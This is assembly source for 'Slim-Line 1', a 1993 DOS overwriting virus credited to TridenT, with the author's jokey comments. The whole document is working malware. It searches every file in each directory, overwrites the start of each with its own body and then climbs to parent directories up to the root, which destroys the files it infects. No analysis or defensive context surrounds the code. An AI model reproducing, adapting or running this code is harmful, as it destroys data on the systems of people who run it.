; ; The Slim-Line 1 virus, from the Slim-line virus strain. ; (C) 1993 by [DàRkRàY]/TridenT ; ; This one's a dumb overwriting virus, as small as possible, ; return to DOS and work with all dos versions. (no SI=100h tricks ect.) ; _CODE SEGMENT ASSUME CS:_CODE, DS:_CODE, ES:_CODE ORG 100h FIRST: DB "*.*", 000h ; Infect ALL files.. MOV AH,4Eh ; Find first... XOR CX,CX ; No attributes. AGAIN: MOV DX,100h ; String from 100h PUSH DX ; Save 100h for later. INT 21h ; Find it! JC DIR_HIGHER ; Not found??? MOV AX,3D01h ; Open it... MOV DX,9Eh ; Yeah, THAT file! INT 21h ; I said NOW! XCHG AX,BX ; Put handle in BX... MOV AH,40h ; Infect it. MOV CL,(LAST-FIRST) ; Thats how big I am... POP DX ; Save it, ya remember... INT 21h ; Go get it! MOV AH,3Eh ; Party is over, INT 21h ; close it.. MOV AH,4Fh ; Who's next! JMP AGAIN CHD DB "..", 000h ; Dir higher 8^] DIR_HIGHER: MOV AH,3Bh ; Change dir. POP DX ; Don't mess with stack... MOV DX,OFFSET CHD ; Dir higher... INT 21h ; Ok... JNC FIRST ; Root?? EXIT: RET ; Then exit.. LAST: _CODE ENDS END FIRST